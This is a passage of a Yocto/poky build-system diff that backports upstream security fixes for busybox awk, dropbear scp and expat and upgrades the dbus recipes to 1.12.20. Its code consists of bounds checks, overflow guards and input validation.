in awk + +Description: fix multiple security issues in awk +Origin: backported awk.c from busybox 1.34.1 + +CVE: CVE-2021-42378 +CVE: CVE-2021-42379 +CVE: CVE-2021-42380 +CVE: CVE-2021-42381 +CVE: CVE-2021-42382 +CVE: CVE-2021-42384 +CVE: CVE-2021-42385 +CVE: CVE-2021-42386 + +Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/busybox/1:1.30.1-6ubuntu3.1/busybox_1.30.1-6ubuntu3.1.debian.tar.xz] + +Comment: Refreshed first hunk and removed few hunks as they are already present in source. + +Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com> +Signed-off-by: Ranjitsinh Rathod <Ranjitsinh.Rathod@kpit.com> + +--- + editors/awk.c | 80 ++++++++++++++++++++++++++++++++++++++------------- + 1 file changed, 60 insertions(+), 20 deletions(-) + +diff --git a/editors/awk.c b/editors/awk.c +index d25508e..4e4f282 100644 +--- a/editors/awk.c ++++ b/editors/awk.c +@@ -272,7 +272,8 @@ typedef struct tsplitter_s { + /* if previous token class is CONCAT1 and next is CONCAT2, concatenation */ + /* operator is inserted between them */ + #define TC_CONCAT1 (TC_VARIABLE | TC_ARRTERM | TC_SEQTERM \ +- | TC_STRING | TC_NUMBER | TC_UOPPOST) ++ | TC_STRING | TC_NUMBER | TC_UOPPOST \ ++ | TC_LENGTH) + #define TC_CONCAT2 (TC_OPERAND | TC_UOPPRE) + + #define OF_RES1 0x010000 +@@ -404,7 +405,7 @@ static const char tokenlist[] ALIGN1 = + + #define OC_B OC_BUILTIN + +-static const uint32_t tokeninfo[] = { ++static const uint32_t tokeninfo[] ALIGN4 = { + 0, + 0, + OC_REGEXP, +@@ -1070,8 +1071,10 @@ static uint32_t next_token(uint32_t expected) + const uint32_t *ti; + + if (t_rollback) { ++ debug_printf_parse("%s: using rolled-back token\n", __func__); + t_rollback = FALSE; + } else if (concat_inserted) { ++ debug_printf_parse("%s: using concat-inserted token\n", __func__); + concat_inserted = FALSE; + t_tclass = save_tclass; + t_info = save_info; +@@ -1200,7 +1203,11 @@ static uint32_t next_token(uint32_t expected) + goto readnext; + + /* insert concatenation operator when needed */ +- if ((ltclass & TC_CONCAT1) && (tc & TC_CONCAT2) && (expected & TC_BINOP)) { ++ debug_printf_parse("%s: %x %x %x concat_inserted?\n", __func__, ++ (ltclass & TC_CONCAT1), (tc & TC_CONCAT2), (expected & TC_BINOP)); ++ if ((ltclass & TC_CONCAT1) && (tc & TC_CONCAT2) && (expected & TC_BINOP) ++ && !(ltclass == TC_LENGTH && tc == TC_SEQSTART) /* but not for "length(..." */ ++ ) { + concat_inserted = TRUE; + save_tclass = tc; + save_info = t_info; +@@ -1208,6 +1215,7 @@ static uint32_t next_token(uint32_t expected) + t_info = OC_CONCAT | SS | P(35); + } + ++ debug_printf_parse("%s: t_tclass=tc=%x\n", __func__, t_tclass); + t_tclass = tc; + } + ltclass = t_tclass; +@@ -1218,6 +1226,7 @@ static uint32_t next_token(uint32_t expected) + EMSG_UNEXP_EOS : EMSG_UNEXP_TOKEN); + } + ++ debug_printf_parse("%s: returning, ltclass:%x t_double:%f\n", __func__, ltclass, t_double); + return ltclass; + #undef concat_inserted + #undef save_tclass +@@ -1282,7 +1291,7 @@ static node *parse_expr(uint32_t iexp) + glptr = NULL; + + } else if (tc & (TC_BINOP | TC_UOPPOST)) { +- debug_printf_parse("%s: TC_BINOP | TC_UOPPOST\n", __func__); ++ debug_printf_parse("%s: TC_BINOP | TC_UOPPOST tc:%x\n", __func__, tc); + /* for binary and postfix-unary operators, jump back over + * previous operators with higher priority */ + vn = cn; +@@ -1350,8 +1359,10 @@ static node *parse_expr(uint32_t iexp) + v = cn->l.v = xzalloc(sizeof(var)); + if (tc & TC_NUMBER) + setvar_i(v, t_double); +- else ++ else { + setvar_s(v, t_string); ++ xtc &= ~TC_UOPPOST; /* "str"++ is not allowed */ ++ } + break; + + case TC_REGEXP: +@@ -1387,7 +1398,12 @@ static node *parse_expr(uint32_t iexp) + + case TC_LENGTH: + debug_printf_parse("%s: TC_LENGTH\n", __func__); +- next_token(TC_SEQSTART | TC_OPTERM | TC_GRPTERM); ++ next_token(TC_SEQSTART /* length(...) */ ++ | TC_OPTERM /* length; (or newline)*/ ++ | TC_GRPTERM /* length } */ ++ | TC_BINOPX /* length <op> NUM */ ++ | TC_COMMA /* print length, 1 */ ++ ); + rollback_token(); + if (t_tclass & TC_SEQSTART) { + /* It was a "(" token. Handle just like TC_BUILTIN */ +@@ -1747,12 +1763,34 @@ static void fsrealloc(int size) + nfields = size; + } + ++static int regexec1_nonempty(const regex_t *preg, const char *s, regmatch_t pmatch[]) ++{ ++ int r = regexec(preg, s, 1, pmatch, 0); ++ if (r == 0 && pmatch[0].rm_eo == 0) { ++ /* For example, happens when FS can match ++ * an empty string (awk -F ' *'). Logically, ++ * this should split into one-char fields. ++ * However, gawk 5.0.1 searches for first ++ * _non-empty_ separator string match: ++ */ ++ size_t ofs = 0; ++ do { ++ ofs++; ++ if (!s[ofs]) ++ return REG_NOMATCH; ++ regexec(preg, s + ofs, 1, pmatch, 0); ++ } while (pmatch[0].rm_eo == 0); ++ pmatch[0].rm_so += ofs; ++ pmatch[0].rm_eo += ofs; ++ } ++ return r; ++} ++ + static int awk_split(const char *s, node *spl, char **slist) + { +- int l, n; ++ int n; + char c[4]; + char *s1; +- regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough... + + /* in worst case, each char would be a separate field */ + *slist = s1 = xzalloc(strlen(s) * 2 + 3); +@@ -1769,29 +1807,31 @@ static int awk_split(const char *s, node *spl, char **slist) + return n; /* "": zero fields */ + n++; /* at least one field will be there */ + do { ++ int l; ++ regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough... ++ + l = strcspn(s, c+2); /* len till next NUL or \n */ +- if (regexec(icase ? spl->r.ire : spl->l.re, s, 1, pmatch, 0) == 0 ++ if (regexec1_nonempty(icase ? spl->r.ire : spl->l.re, s, pmatch) == 0 + && pmatch[0].rm_so <= l + ) { ++ /* if (pmatch[0].rm_eo == 0) ... - impossible */ + l = pmatch[0].rm_so; +- if (pmatch[0].rm_eo == 0) { +- l++; +- pmatch[0].rm_eo++; +- } + n++; /* we saw yet another delimiter */ + } else { + pmatch[0].rm_eo = l; + if (s[l]) + pmatch[0].rm_eo++; + } +- memcpy(s1, s, l); +- /* make sure we remove *all* of the separator chars */ +- do { +- s1[l] = '\0'; +- } while (++l < pmatch[0].rm_eo); +- nextword(&s1); ++ s1 = mempcpy(s1, s, l); ++ *s1++ = '\0'; + s += pmatch[0].rm_eo; + } while (*s); ++ ++ /* echo a-- | awk -F-- '{ print NF, length($NF), $NF }' ++ * should print "2 0 ": ++ */ ++ *s1 = '\0'; ++ + return n; + } + if (c[0] == '\0') { /* null split */ +@@ -1995,7 +2035,7 @@ static int ptest(node *pattern) + static int awk_getline(rstream *rsm, var *v) + { + char *b; +- regmatch_t pmatch[2]; ++ regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough... + int size, a, p, pp = 0; + int fd, so, eo, r, rp; + char c, *m, *s; diff --git a/poky/meta/recipes-core/dbus-wait/dbus-wait_git.bb b/poky/meta/recipes-core/dbus-wait/dbus-wait_git.bb index 677768d35a..b39f7523c0 100644 --- a/poky/meta/recipes-core/dbus-wait/dbus-wait_git.bb +++ b/poky/meta/recipes-core/dbus-wait/dbus-wait_git.bb @@ -11,7 +11,7 @@ SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517" PV = "0.1+git${SRCPV}" PR = "r2" -SRC_URI = "git://git.yoctoproject.org/${BPN}" +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master" UPSTREAM_CHECK_COMMITS = "1" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-core/dbus/dbus-test_1.12.16.bb b/poky/meta/recipes-core/dbus/dbus-test_1.12.20.bb index bea0e74ed0..755c841bad 100644 --- a/poky/meta/recipes-core/dbus/dbus-test_1.12.16.bb +++ b/poky/meta/recipes-core/dbus/dbus-test_1.12.20.bb @@ -1,57 +1,31 @@ SUMMARY = "D-Bus test package (for D-bus functionality testing only)" HOMEPAGE = "http://dbus.freedesktop.org" SECTION = "base" -LICENSE = "AFL-2.1 | GPLv2+" -LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \ - file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c" -DEPENDS = "dbus glib-2.0" +require dbus.inc -RDEPENDS_${PN}-dev = "" +SRC_URI += "file://run-ptest \ + file://python-config.patch \ + " -SRC_URI = "http://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \ - file://tmpdir.patch \ - file://run-ptest \ - file://python-config.patch \ - file://clear-guid_from_server-if-send_negotiate_unix_f.patch \ - " +DEPENDS = "dbus glib-2.0" -SRC_URI[md5sum] = "2dbeae80dfc9e3632320c6a53d5e8890" -SRC_URI[sha256sum] = "54a22d2fa42f2eb2a871f32811c6005b531b9613b1b93a0d269b05e7549fec80" +RDEPENDS_${PN}-dev = "" S="${WORKDIR}/dbus-${PV}" FILESEXTRAPATHS =. "${FILE_DIRNAME}/dbus:" -inherit autotools pkgconfig gettext ptest upstream-version-is-even +inherit ptest -EXTRA_OECONF_X = "${@bb.utils.contains('DISTRO_FEATURES', 'x11', '--with-x', '--without-x', d)}" -EXTRA_OECONF_X_class-native = "--without-x" - -EXTRA_OECONF = "--enable-tests \ +EXTRA_OECONF += "--enable-tests \ --enable-modular-tests \ --enable-installed-tests \ --enable-checks \ --enable-asserts \ - --enable-largefile \ - --disable-xml-docs \ - --disable-doxygen-docs \ - --disable-libaudit \ --with-dbus-test-dir=${PTEST_PATH} \ - ${EXTRA_OECONF_X} \ --enable-embedded-tests \ " -EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl" - -PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)}" -PACKAGECONFIG_class-native = "" -PACKAGECONFIG_class-nativesdk = "" - -PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd" -PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm" -PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session" -PACKAGECONFIG[verbose-mode] = "--enable-verbose-mode,,," - do_install() { : } diff --git a/poky/meta/recipes-core/dbus/dbus.inc b/poky/meta/recipes-core/dbus/dbus.inc new file mode 100644 index 0000000000..dcbcc0a9d6 --- /dev/null +++ b/poky/meta/recipes-core/dbus/dbus.inc @@ -0,0 +1,34 @@ +inherit autotools pkgconfig gettext upstream-version-is-even + +LICENSE = "AFL-2.1 | GPLv2+" +LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \ + file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c" + +SRC_URI = "https://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \ + file://tmpdir.patch \ + file://dbus-1.init \ + file://clear-guid_from_server-if-send_negotiate_unix_f.patch \ +" + +SRC_URI[md5sum] = "dfe8a71f412e0b53be26ed4fbfdc91c4" +SRC_URI[sha256sum] = "f77620140ecb4cdc67f37fb444f8a6bea70b5b6461f12f1cbe2cec60fa7de5fe" + +EXTRA_OECONF = "--disable-xml-docs \ + --disable-doxygen-docs \ + --disable-libaudit \ + --enable-largefile \ + --with-system-socket=/run/dbus/system_bus_socket \ + " +EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl" +EXTRA_OECONF_append_class-native = " --disable-selinux" + +PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)} \ + user-session \ + " +PACKAGECONFIG_class-native = "" +PACKAGECONFIG_class-nativesdk = "" + +PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd" +PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm" +PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session" +PACKAGECONFIG[verbose-mode] = "--enable-verbose-mode,,," diff --git a/poky/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch b/poky/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch deleted file mode 100644 index ac7a4b7a71..0000000000 --- a/poky/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch +++ /dev/null @@ -1,78 +0,0 @@ -From 872b085f12f56da25a2dbd9bd0b2dff31d5aea63 Mon Sep 17 00:00:00 2001 -From: Simon McVittie <smcv@collabora.com> -Date: Thu, 16 Apr 2020 14:45:11 +0100 -Subject: [PATCH] sysdeps-unix: On MSG_CTRUNC, close the fds we did receive - -MSG_CTRUNC indicates that we have received fewer fds that we should -have done because the buffer was too small, but we were treating it -as though it indicated that we received *no* fds. If we received any, -we still have to make sure we close them, otherwise they will be leaked. - -On the system bus, if an attacker can induce us to leak fds in this -way, that's a local denial of service via resource exhaustion. - -Reported-by: Kevin Backhouse, GitHub Security Lab -Fixes: dbus#294 -Fixes: CVE-2020-12049 -Fixes: GHSL-2020-057 - -Upstream-Status: Backport [https://gitlab.freedesktop.org/dbus/dbus/-/commit/872b085f12f56da25a2dbd9bd0b2dff31d5aea63] -CVE: CVE-2020-12049 -Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com> ---- - dbus/dbus-sysdeps-unix.c | 32 ++++++++++++++++++++------------ - 1 file changed, 20 insertions(+), 12 deletions(-) - -diff --git a/dbus/dbus-sysdeps-unix.c b/dbus/dbus-sysdeps-unix.c -index b5fc2466..b176dae1 100644 ---- a/dbus/dbus-sysdeps-unix.c -+++ b/dbus/dbus-sysdeps-unix.c -@@ -435,18 +435,6 @@ _dbus_read_socket_with_unix_fds (DBusSocket fd, - struct cmsghdr *cm; - dbus_bool_t found = FALSE; - -- if (m.msg_flags & MSG_CTRUNC) -- { -- /* Hmm, apparently the control data was truncated. The bad -- thing is that we might have completely lost a couple of fds -- without chance to recover them. Hence let's treat this as a -- serious error. */ -- -- errno = ENOSPC; -- _dbus_string_set_length (buffer, start); -- return -1; -- } -- - for (cm = CMSG_FIRSTHDR(&m); cm; cm = CMSG_NXTHDR(&m, cm)) - if (cm->cmsg_level == SOL_SOCKET && cm->cmsg_type == SCM_RIGHTS) - { -@@ -501,6 +489,26 @@ _dbus_read_socket_with_unix_fds (DBusSocket fd, - if (!found) - *n_fds = 0; - -+ if (m.msg_flags & MSG_CTRUNC) -+ { -+ unsigned int i; -+ -+ /* Hmm, apparently the control data was truncated. The bad -+ thing is that we might have completely lost a couple of fds -+ without chance to recover them. Hence let's treat this as a -+ serious error. */ -+ -+ /* We still need to close whatever fds we *did* receive, -+ * otherwise they'll never get closed. (CVE-2020-12049) */ -+ for (i = 0; i < *n_fds; i++) -+ close (fds[i]); -+ -+ *n_fds = 0; -+ errno = ENOSPC; -+ _dbus_string_set_length (buffer, start); -+ return -1; -+ } -+ - /* put length back (doesn't actually realloc) */ - _dbus_string_set_length (buffer, start + bytes_read); - --- -2.25.1 - diff --git a/poky/meta/recipes-core/dbus/dbus_1.12.16.bb b/poky/meta/recipes-core/dbus/dbus_1.12.20.bb index 10d1b34448..cf6f7dc0ef 100644 --- a/poky/meta/recipes-core/dbus/dbus_1.12.16.bb +++ b/poky/meta/recipes-core/dbus/dbus_1.12.20.bb @@ -2,9 +2,9 @@ SUMMARY = "D-Bus message bus" DESCRIPTION = "D-Bus is a message bus system, a simple way for applications to talk to one another. In addition to interprocess communication, D-Bus helps coordinate process lifecycle; it makes it simple and reliable to code a \"single instance\" application or daemon, and to launch applications and daemons on demand when their services are needed." HOMEPAGE = "https://dbus.freedesktop.org" SECTION = "base" -LICENSE = "AFL-2.1 | GPLv2+" -LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \ - file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c" + +require dbus.inc + DEPENDS = "expat virtual/libintl autoconf-archive" RDEPENDS_dbus_class-native = "" RDEPENDS_dbus_class-nativesdk = "" @@ -12,17 +12,7 @@ PACKAGES += "${@bb.utils.contains('DISTRO_FEATURES', 'ptest', '${PN}-ptest', '', ALLOW_EMPTY_dbus-ptest = "1" RDEPENDS_dbus-ptest_class-target = "dbus-test-ptest" -SRC_URI = "https://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \ - file://tmpdir.patch \ - file://dbus-1.init \ - file://clear-guid_from_server-if-send_negotiate_unix_f.patch \ - file://CVE-2020-12049.patch \ -" - -SRC_URI[md5sum] = "2dbeae80dfc9e3632320c6a53d5e8890" -SRC_URI[sha256sum] = "54a22d2fa42f2eb2a871f32811c6005b531b9613b1b93a0d269b05e7549fec80" - -inherit useradd autotools pkgconfig gettext update-rc.d upstream-version-is-even +inherit useradd update-rc.d INITSCRIPT_NAME = "dbus-1" INITSCRIPT_PARAMS = "start 02 5 3 2 . stop 20 0 1 6 ." @@ -93,27 +83,7 @@ pkg_postinst_dbus() { } -EXTRA_OECONF = "--disable-tests \ - --disable-xml-docs \ - --disable-doxygen-docs \ - --disable-libaudit \ - --enable-largefile \ - --with-system-socket=/run/dbus/system_bus_socket \ - " - -EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl" -EXTRA_OECONF_append_class-native = " --disable-selinux" - -PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)} \ - user-session \ - " - -PACKAGECONFIG_class-native = "" -PACKAGECONFIG_class-nativesdk = "" - -PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd" -PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm" -PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session" +EXTRA_OECONF += "--disable-tests" do_install() { autotools_do_install diff --git a/poky/meta/recipes-core/dropbear/dropbear.inc b/poky/meta/recipes-core/dropbear/dropbear.inc index d41e8b36dc..b949a9a337 100644 --- a/poky/meta/recipes-core/dropbear/dropbear.inc +++ b/poky/meta/recipes-core/dropbear/dropbear.inc @@ -22,7 +22,9 @@ SRC_URI = "http://matt.ucc.asn.au/dropbear/releases/dropbear-${PV}.tar.bz2 \ file://dropbear.socket \ file://dropbear.default \ ${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \ - ${@bb.utils.contains('PACKAGECONFIG', 'disable-weak-ciphers', 'file://dropbear-disable-weak-ciphers.patch', '', d)} " + ${@bb.utils.contains('PACKAGECONFIG', 'disable-weak-ciphers', 'file://dropbear-disable-weak-ciphers.patch', '', d)} \ + file://CVE-2020-36254.patch \ + " PAM_SRC_URI = "file://0005-dropbear-enable-pam.patch \ file://0006-dropbear-configuration-file.patch \ diff --git a/poky/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch b/poky/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch new file mode 100644 index 0000000000..64d0d96486 --- /dev/null +++ b/poky/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch @@ -0,0 +1,29 @@ +From c96c48d62aefc372f2105293ddf8cff2d116dc3a Mon Sep 17 00:00:00 2001 +From: Haelwenn Monnier <contact+github.com@hacktivis.me> +Date: Mon, 25 May 2020 14:54:29 +0200 +Subject: [PATCH] scp.c: Port OpenSSH CVE-2018-20685 fix (#80) + +Reference: +https://github.com/mkj/dropbear/commit/8f8a3dff705fad774a10864a2e3dbcfa9779ceff + +CVE: CVE-2020-36254 +Upstream-Status: Backport + +--- + scp.c | 3 ++- + 1 file changed, 2 insertions(+), 1 deletion(-) + +diff --git a/scp.c b/scp.c +index 742ae00..7b8e7d2 100644 +--- a/scp.c ++++ b/scp.c +@@ -935,7 +935,8 @@ sink(int argc, char **argv) + size = size * 10 + (*cp++ - '0'); + if (*cp++ != ' ') + SCREWUP("size not delimited"); +- if ((strchr(cp, '/') != NULL) || (strcmp(cp, "..") == 0)) { ++ if (*cp == '\0' || strchr(cp, '/') != NULL || ++ strcmp(cp, ".") == 0 || strcmp(cp, "..") == 0) { + run_err("error: unexpected filename: %s", cp); + exit(1); + } diff --git a/poky/meta/recipes-core/expat/expat/CVE-2021-45960.patch b/poky/meta/recipes-core/expat/expat/CVE-2021-45960.patch new file mode 100644 index 0000000000..523449e22c --- /dev/null +++ b/poky/meta/recipes-core/expat/expat/CVE-2021-45960.patch @@ -0,0 +1,65 @@ +From 0adcb34c49bee5b19bd29b16a578c510c23597ea Mon Sep 17 00:00:00 2001 +From: Sebastian Pipping <sebastian@pipping.org> +Date: Mon, 27 Dec 2021 20:15:02 +0100 +Subject: [PATCH] lib: Detect and prevent troublesome left shifts in function + storeAtts (CVE-2021-45960) + +Upstream-Status: Backport: +https://github.com/libexpat/libexpat/pull/534/commits/0adcb34c49bee5b19bd29b16a578c510c23597ea + +CVE: CVE-2021-45960 +Signed-off-by: Steve Sakoman <steve@sakoman.com> + +--- + expat/lib/xmlparse.c | 31 +++++++++++++++++++++++++++++-- + 1 file changed, 29 insertions(+), 2 deletions(-) + +diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c +index d730f41c3..b47c31b05 100644 +--- a/lib/xmlparse.c ++++ b/lib/xmlparse.c +@@ -3414,7 +3414,13 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr, + if (nPrefixes) { + int j; /* hash table index */ + unsigned long version = parser->m_nsAttsVersion; +- int nsAttsSize = (int)1 << parser->m_nsAttsPower; ++ ++ /* Detect and prevent invalid shift */ ++ if (parser->m_nsAttsPower >= sizeof(unsigned int) * 8 /* bits per byte */) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ ++ unsigned int nsAttsSize = 1u << parser->m_nsAttsPower; + unsigned char oldNsAttsPower = parser->m_nsAttsPower; + /* size of hash table must be at least 2 * (# of prefixed attributes) */ + if ((nPrefixes << 1) +@@ -3425,7 +3431,28 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr, + ; + if (parser->m_nsAttsPower < 3) + parser->m_nsAttsPower = 3; +- nsAttsSize = (int)1 << parser->m_nsAttsPower; ++ ++ /* Detect and prevent invalid shift */ ++ if (parser->m_nsAttsPower >= sizeof(nsAttsSize) * 8 /* bits per byte */) { ++ /* Restore actual size of memory in m_nsAtts */ ++ parser->m_nsAttsPower = oldNsAttsPower; ++ return XML_ERROR_NO_MEMORY; ++ } ++ ++ nsAttsSize = 1u << parser->m_nsAttsPower; ++ ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if (nsAttsSize > (size_t)(-1) / sizeof(NS_ATT)) { ++ /* Restore actual size of memory in m_nsAtts */ ++ parser->m_nsAttsPower = oldNsAttsPower; ++ return XML_ERROR_NO_MEMORY; ++ } ++#endif ++ + temp = (NS_ATT *)REALLOC(parser, parser->m_nsAtts, + nsAttsSize * sizeof(NS_ATT)); + if (! temp) { diff --git a/poky/meta/recipes-core/expat/expat/CVE-2021-46143.patch b/poky/meta/recipes-core/expat/expat/CVE-2021-46143.patch new file mode 100644 index 0000000000..d6bafba0ff --- /dev/null +++ b/poky/meta/recipes-core/expat/expat/CVE-2021-46143.patch @@ -0,0 +1,43 @@ +From 85ae9a2d7d0e9358f356b33977b842df8ebaec2b Mon Sep 17 00:00:00 2001 +From: Sebastian Pipping <sebastian@pipping.org> +Date: Sat, 25 Dec 2021 20:52:08 +0100 +Subject: [PATCH] lib: Prevent integer overflow on m_groupSize in function + doProlog (CVE-2021-46143) + +--- + expat/lib/xmlparse.c | 15 +++++++++++++++ + 1 file changed, 15 insertions(+) + +diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c +index b47c31b0..8f243126 100644 +--- a/lib/xmlparse.c ++++ b/lib/xmlparse.c +@@ -5046,6 +5046,11 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end, + if (parser->m_prologState.level >= parser->m_groupSize) { + if (parser->m_groupSize) { + { ++ /* Detect and prevent integer overflow */ ++ if (parser->m_groupSize > (unsigned int)(-1) / 2u) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ + char *const new_connector = (char *)REALLOC( + parser, parser->m_groupConnector, parser->m_groupSize *= 2); + if (new_connector == NULL) { +@@ -5056,6 +5061,16 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end, + } + + if (dtd->scaffIndex) { ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if (parser->m_groupSize > (size_t)(-1) / sizeof(int)) { ++ return XML_ERROR_NO_MEMORY; ++ } ++#endif ++ + int *const new_scaff_index = (int *)REALLOC( + parser, dtd->scaffIndex, parser->m_groupSize * sizeof(int)); + if (new_scaff_index == NULL) diff --git a/poky/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch b/poky/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch new file mode 100644 index 0000000000..e569fbc7ab --- /dev/null +++ b/poky/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch @@ -0,0 +1,257 @@ +From 9f93e8036e842329863bf20395b8fb8f73834d9e Mon Sep 17 00:00:00 2001 +From: Sebastian Pipping <sebastian@pipping.org> +Date: Thu, 30 Dec 2021 22:46:03 +0100 +Subject: [PATCH] lib: Prevent integer overflow at multiple places + (CVE-2022-22822 to CVE-2022-22827) + +The involved functions are: +- addBinding (CVE-2022-22822) +- build_model (CVE-2022-22823) +- defineAttribute (CVE-2022-22824) +- lookup (CVE-2022-22825) +- nextScaffoldPart (CVE-2022-22826) +- storeAtts (CVE-2022-22827) + +Upstream-Status: Backport: +https://github.com/libexpat/libexpat/pull/539/commits/9f93e8036e842329863bf20395b8fb8f73834d9e + +CVE: CVE-2022-22822 CVE-2022-22823 CVE-2022-22824 CVE-2022-22825 CVE-2022-22826 CVE-2022-22827 +Signed-off-by: Steve Sakoman <steve@sakoman.com> + +--- + expat/lib/xmlparse.c | 153 ++++++++++++++++++++++++++++++++++++++++++- + 1 file changed, 151 insertions(+), 2 deletions(-) + +diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c +index 8f243126..575e73ee 100644 +--- a/lib/xmlparse.c ++++ b/lib/xmlparse.c +@@ -3261,13 +3261,38 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr, + + /* get the attributes from the tokenizer */ + n = XmlGetAttributes(enc, attStr, parser->m_attsSize, parser->m_atts); ++ ++ /* Detect and prevent integer overflow */ ++ if (n > INT_MAX - nDefaultAtts) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ + if (n + nDefaultAtts > parser->m_attsSize) { + int oldAttsSize = parser->m_attsSize; + ATTRIBUTE *temp; + #ifdef XML_ATTR_INFO + XML_AttrInfo *temp2; + #endif ++ ++ /* Detect and prevent integer overflow */ ++ if ((nDefaultAtts > INT_MAX - INIT_ATTS_SIZE) ++ || (n > INT_MAX - (nDefaultAtts + INIT_ATTS_SIZE))) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ + parser->m_attsSize = n + nDefaultAtts + INIT_ATTS_SIZE; ++ ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(ATTRIBUTE)) { ++ parser->m_attsSize = oldAttsSize; ++ return XML_ERROR_NO_MEMORY; ++ } ++#endif ++ + temp = (ATTRIBUTE *)REALLOC(parser, (void *)parser->m_atts, + parser->m_attsSize * sizeof(ATTRIBUTE)); + if (temp == NULL) { +@@ -3276,6 +3301,17 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr, + } + parser->m_atts = temp; + #ifdef XML_ATTR_INFO ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++# if UINT_MAX >= SIZE_MAX ++ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(XML_AttrInfo)) { ++ parser->m_attsSize = oldAttsSize; ++ return XML_ERROR_NO_MEMORY; ++ } ++# endif ++ + temp2 = (XML_AttrInfo *)REALLOC(parser, (void *)parser->m_attInfo, + parser->m_attsSize * sizeof(XML_AttrInfo)); + if (temp2 == NULL) { +@@ -3610,9 +3646,31 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr, + tagNamePtr->prefixLen = prefixLen; + for (i = 0; localPart[i++];) + ; /* i includes null terminator */ ++ ++ /* Detect and prevent integer overflow */ ++ if (binding->uriLen > INT_MAX - prefixLen ++ || i > INT_MAX - (binding->uriLen + prefixLen)) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ + n = i + binding->uriLen + prefixLen; + if (n > binding->uriAlloc) { + TAG *p; ++ 